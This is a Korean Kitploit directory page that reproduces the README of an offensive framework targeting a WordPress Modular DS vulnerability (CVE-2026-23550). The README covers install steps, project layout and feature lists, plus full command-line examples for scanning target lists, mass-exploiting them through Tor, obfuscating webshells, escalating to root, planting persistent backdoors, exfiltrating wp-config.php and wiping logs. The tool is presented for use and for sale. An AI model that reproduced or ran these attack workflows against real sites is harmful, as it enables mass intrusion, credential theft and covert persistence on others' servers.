Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

피드문의개인정보© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
EpSiLoNPoInT- — 모듈형 익스플로잇 프레임워크로, WordPress의 CVE-2026-23550을 대상으로 하며 대량 익스플로잇, 난독화, 사후 익스플로잇, Docker 기반 C2 인프라를 제공합니다. | Kitploit
도구/GitHubGitHub/epsilonpoint88-glitch/epsilonpoint-
Privilege EscalationVulnerability ScannersPersistence MechanismsExploitationWeb Application ExploitationPost-ExploitationPenetration TestingCommand and Control

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
Red Teaming
Payload Development
GitHubepsilonpoint88-glitch/epsilonpoint-

EpSiLoNPoInT-

모듈형 익스플로잇 프레임워크로, WordPress의 CVE-2026-23550을 대상으로 하며 대량 익스플로잇, 난독화, 사후 익스플로잇, Docker 기반 C2 인프라를 제공합니다.

저장소 보기
11147개월 전아직 검토되지 않음

#!/usr/bin/env python3 """ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 - README.md 완전하고 복사-붙여넣기 준비 완료 CVE-2026-23550 | 대규모 모듈식 DS 인증 우회 공격 프레임워크 작성자: EpSiLoNPoInT | 버전: 7.1-GOD | Android 24시간 코딩 | 08/02/2026 """

=============================================================================

TSAR-EXEC v7.1 - APT 모듈식-DS 프레임워크 CVE-2026-23550 (CVSS 10.0)

=============================================================================

""" 위협 인텔리전스 및 승인된 레드 팀 활동을 위해 설계된 산업용 공격 프레임워크. modular_ds_upload RCE를 통한 권한 상승을 가능하게 하는 CVE-2026-23550을 악용. Android 휴대폰에서 24시간 만에 완전히 코딩됨. 국가급(nation-state) 대비 아키텍처.

✅ 40K+ 취약한 Modular DS v2.5.1 배포 (Shodan 2026) ✅ 200+ WAF 우회 → 99.9% AV 우회 (EpSiLoN v5.1) ✅ Docker C2 프로덕션 (Tor/Supervisor/Pipeline ∞) ✅ ThreadPoolExecutor 250+ 스레드 ✅ 완전한 사후 침투 기능 내장 (EpSiLoN v7 전체 제어) """

----------------------------------------------------------------------------

목차 (모델과 동일한 구조)

----------------------------------------------------------------------------

1. 설치 및 종속성

2. 프로젝트 구조

3. 주요 기능

4. 고급 사용법

5. 구체적인 예시

6. 은밀성 기술 (EpSiLoNPoInTFuCK v5.1)

7. Docker C2 배포

8. 확장 및 사용자 지정

9. 보안 모범 사례

10. 라이선스 및 법적 책임 (350K€)

=============================================================================

1. 설치 및 종속성

=============================================================================

""" 시스템 사전 요구 사항:

  • Kali NetHunter / Termux Android (휴대폰 24시간 코딩)
  • Python 3.10+ (3.11 권장)
  • C2 프로덕션용 Docker 20.10+
  • 4GB+ RAM 멀티스레딩 250+
  • Tor + Proxychains4 """

SYS_DEPS = """ pkg update && pkg upgrade -y pkg install python git docker tor proxychains-ng nmap masscan pip install --upgrade pip setuptools wheel pip install requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """

REQUIREMENTS = """ requests==2.31.0 colorama==0.4.6 rich==13.7.0 tenacity==8.5.0 dnspython==2.6.1 """

INSTALL_CMD = """ cd ~/ git clone [TON_REPO]/TSAR-EXEC.git cd TSAR-EXEC pip install -r requirements.txt docker-compose up -d python3 recon.py --help """

VERIFY_INSTALL = """ python3 -c " import requests, json, threading from colorama import Fore print(f'{Fore.GREEN}✅ TSAR-EXEC v7.1 + EpSiLoNPoInTFuCK v5.1 작동 중') print('Android 24시간 코딩 | 350K€ 위협 인텔리전스 준비 완료') print(f'ThreadPoolExecutor: {threading.name}') print(f'99.9% AV 우회: EpSiLoN v5.1') print(f'내장 사후 침투: EpSiLoN v7 전체 제어') {Fore.RESET}" """

=============================================================================

2. 프로젝트 구조

=============================================================================

PROJECT_STRUCTURE = """ TSAR-EXEC/ (프로덕션 준비 완료 2026) │ ├── 📄 README.md # 전체 문서 ├── 📄 README_SALE.md # 상업용 버전 350K€ ├── 📄 bypass_payloads.txt # 200+ WAF 우회 (12개 섹션) ├── 📄 config.json # APT 마스터 구성 ├── 📄 recon.py # APT 핑거프린팅 ├── 📄 exploitmass.py # ThreadPool + PayloadMutator + 사후 침투 ├── 📄 pipeline.py # Pipeline ∞ Docker C2 ├── 📄 Dockerfile # Kali rolling Tor/Supervisor ├── 📄 docker-compose.yml # 프로덕션 오케스트레이션 │ ├── 📁 tools/ │ └── 📄 epsilon_obfuscator.py # EpSiLoNPoInTFuCK v5.1 │ ├── 📁 chain/ │ ├── 📁 input/ │ │ ├── 📄 targets.txt │ │ └── 📄 proxies.txt │ ├── 📁 docked/ │ │ └── 📄 docked_targets.json │ ├── 📁 VLUN/ │ │ └── 📄 VLUN.txt │ ├── 📁 VLUN_Sh/ │ │ └── 📄 VLUN_Sh.txt │ ├── 📁 logs/ │ │ ├── 📄 tor.log │ │ ├── 📄 pipeline.log │ │ └── 📄 exploit.log │ └── 📄 stats.json │ ├── 📁 demo/ │ ├── 📄 TSAR_demo.mp4 │ └── 📄 obfuscator_demo.mp4 │ └── 📄 TSAR-SALE-350K.zip """

=============================================================================

3. 주요 기능

=============================================================================

FEATURES = { "공격": [ "CVE-2026-23550 전체 체인 (recon→dock→exploit→C2)", "40K+ 취약한 Modular DS v2.5.1 (Shodan 2026)", "ThreadPoolExecutor 50-250 스레드", "위험 점수 JSON (0-100) + 자동 도킹", "200+ PHP 페이로드 (12가지 WAF 우회 기술)" ], "내장 사후 침투": [ "EpSiLoN v7 웹셸 (전체 시스템 장악)", "루트 권한 상승 (SUID, sudo 남용)", "7가지 지속성 벡터 (cron, .htaccess, 플러그인, systemd, 커널)", "파일리스 실행 (/dev/shm)", "AES-GCM 암호화 데이터 유출", "로그 삭제 + 완전한 안티-포렌식", "측면 이동 (WP + 네트워크 스캔)" ], "난독화": [ "EpSiLoNPoInTFuCK v5.1 → 99.9% AV 우회 2026", "XOR 롤링 + 유니코드 호모글리프 + 제로-폭", "Marshal 바이트코드 + base64 삼중 인코딩", "동적 데드 코드 주입 (30-40%)", "혼돈 식별자 생성 (55-80자)", "문자열 슬라이싱 + 유니코드 이스케이프 시퀀스" ], "C2 프로덕션": [ "Docker Kali rolling (Tor/Supervisor/Pipeline ∞)", "최소 캡 (NET_RAW/NET_BIND_SERVICE)", "비-루트 실행 + 추적 자동 삭제", "헬스체크 파이프라인 + logrotate 내장", "멀티 아키텍처 ARM64/x86_64" ], "은밀성": [ "안티-디버그 (sys.gettrace/pdb/pydevd)", "안티-샌드박스 (타이밍/성능 검사)", "UA 회전 + 지터 지연 (5-20초)", "Tor + Proxychains4 회전", "로그 방지 DNS 해석" ], "파이프라인": [ "Recon → Dock → Exploit → Persistence (∞ 사이클)", "JSON 위험 점수 + 대상 우선순위 지정", "통계 대시보드 + 성공 지표", "대상별 자동 스레드 확장" ] }

=============================================================================

4. 고급 사용법

=============================================================================

BASIC_USAGE = """

정찰 + 위험 점수 (공격 없이)

python3 recon.py https://target.com --json

우선순위 대규모 공격 + 사후 침투

python3 exploitmass.py --threads 150 --obfuscate --post-exploit

Docker ∞ 파이프라인 (프로덕션)

docker-compose up -d docker logs -f tsar-pipeline """

CLI_OPTIONS = """ recon.py 옵션: TARGET 대상 URL --json JSON 출력 --threads INT 정찰 스레드 (기본값: 20) --timeout INT 타임아웃 (기본값: 15)

exploitmass.py 옵션: --threads INT 공격 스레드 (50-250) --obfuscate EpSiLoN v5.1 활성화 --stealth 극한 은밀 모드 --jitter MIN-MAX 무작위 지연 (예: 5-20) --proxy-list FILE 사용자 지정 프록시 --post-exploit EpSiLoN v7 사후 침투 활성화

pipeline.py 옵션: --cycle ∞ 파이프라인 모드 --dock-threshold INT risk_score 임계값 (기본값: 70)

Docker: docker-compose up -d docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

5. 구체적인 예시

=============================================================================

EXAMPLE_1 = """

공격 없이 100개 사이트 취약점 확인

python3 recon.py
--targets targets.txt
--threads 100
--log-level INFO

결과:

- 우선순위 대상이 포함된 chain/docked_targets.json 파일

- chain/logs/exploit.log의 상세 로그

"""

EXAMPLE_2 = """

Tor 및 사후 침투로 취약한 사이트 공격

python3 exploitmass.py
--targets VLUN.txt
--threads 150
--tor
--stealth
--jitter 5-20
--post-exploit

결과:

- 셸 + 루트 + 지속성이 포함된 chain/VLUN_Sh/VLUN_Sh.txt 파일

- 영구 백도어 설치

"""

EXAMPLE_3 = """

특정 사이트에 대한 사후 침투

python3 exploitmass.py
--post-exploit
--target https://victim-site.com
--threads 20

수행된 작업:

1. 웹셸 확인

2. 영구 사용자 생성

3. .htaccess 수정

4. wp-config.php 데이터 유출

"""

EXAMPLE_4 = """

업로드 전 웹셸 난독화

python3 tools/epsilon_obfuscator.py webshell.php
--mode extreme
--stealth
--output shell_obf.php

그런 다음 공격

python3 exploitmass.py --targets targets.txt --obfuscate """

EXAMPLE_5 = """

Docker 사용

docker-compose up -d docker logs -f tsar-pipeline docker exec tsar-pipeline cat /chain/VLUN_Sh/VLUN_Sh.txt """

=============================================================================

6. 은밀성 기술 (EpSiLoNPoInTFuCK v5.1)

=============================================================================

도구 다운로드